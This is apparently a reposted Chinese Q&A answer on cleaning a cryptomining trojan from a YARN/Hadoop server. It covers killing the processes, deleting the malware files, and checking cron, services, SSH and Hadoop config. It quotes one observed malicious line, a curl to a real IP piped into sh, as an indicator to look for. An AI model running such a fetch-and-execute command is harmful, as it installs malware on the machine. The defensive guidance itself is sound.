疑似YARN遭木马感染求助:重装系统仍存在异常CPU占用进程
结论:这是典型的挖矿木马感染
毫无疑问,你的服务器已经被植入了挖矿木马——从launch_container.sh被篡改执行外部恶意脚本、生成隐藏的高CPU占用进程这些行为来看,完全符合挖矿病毒的特征,而且重装系统后问题复现,说明感染源还没被彻底清除。
一、紧急止损:先终止恶意进程并清理临时文件
先把占满CPU的恶意进程杀掉,再删除相关恶意文件:
# 杀掉已发现的恶意进程 kill -9 7484 7496 # 批量清理所有/var/tmp/java相关进程(防止有漏网的) ps -ef | grep "/var/tmp/java" | grep -v grep | awk '{print $2}' | xargs kill -9
然后删除恶意文件和被篡改的YARN缓存:
rm -rf /var/tmp/java /var/tmp/w.conf # 清理YARN临时目录里的恶意缓存文件 rm -rf /home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/
二、排查感染源(为什么重装系统还存在?)
你重装Ubuntu为CentOS后问题依旧,大概率是以下原因之一:
- 共享存储带毒:比如Hadoop集群使用的HDFS、NFS共享存储,或者挂载的外部磁盘里已经有恶意文件,重装系统后挂载这些存储又被感染
- 系统镜像被篡改:你用来重装CentOS的镜像本身就包含恶意程序,导致重装后直接带毒
- 攻击者仍有远程访问权限:攻击者已经拿到服务器的SSH密钥、弱密码,或者通过其他漏洞获得权限,重装后再次远程植入木马
- Hadoop配置被篡改:YARN的核心配置文件被恶意修改,导致每次启动都会生成带毒的
launch_container.sh
三、彻底清理与系统加固步骤
1. 先断网隔离
断开服务器的网络连接,避免攻击者远程控制或重新植入木马,再进行后续清理。
2. 检查并重置Hadoop配置与脚本
- 检查Hadoop安装目录下的所有启动脚本(尤其是YARN相关脚本),看是否被植入恶意代码,发现异常直接替换为官方原版脚本
- 检查YARN核心配置文件
yarn-site.xml,确认yarn.nodemanager.local-dirs、yarn.nodemanager.log-dirs等路径是否正常,有没有被指向陌生目录;如果配置被篡改,从Hadoop官方下载对应版本的配置模板重置 - 清理HDFS上的可疑文件,避免集群内其他节点被感染
3. 系统层面全面排查
- 检查定时任务:查看用户级定时任务
crontab -l,以及系统级定时任务目录/etc/cron.d/、/etc/cron.hourly/、/etc/cron.daily/,删除任何陌生的定时任务(这类任务通常会定时下载恶意脚本) - 检查开机启动项:用
systemctl list-unit-files --type=service查看所有开机服务,禁用陌生的可疑服务 - 扫描系统病毒:安装ClamAV等开源杀毒软件,对系统全盘扫描,清理残留的恶意文件
- 加固SSH访问:禁用密码登录,改用SSH密钥登录;限制允许登录SSH的IP范围;更换所有用户的SSH密钥对
4. 重置所有权限与密码
- 重置服务器root密码、Hadoop相关用户的密码
- 检查系统用户列表,删除陌生的可疑用户
四、验证清理效果
重启服务器后,做以下验证:
- 用
ps -ef | grep java检查,确认没有/var/tmp/java这类陌生进程 - 启动YARN,查看临时目录下的
launch_container.sh内容,确认没有curl 185.222.210.59/x_wcr.sh | sh这类恶意命令 - 监控CPU使用率,确认没有异常占满的情况
内容的提问来源于stack exchange,提问作者larry
相关产品推荐
相关产品推荐

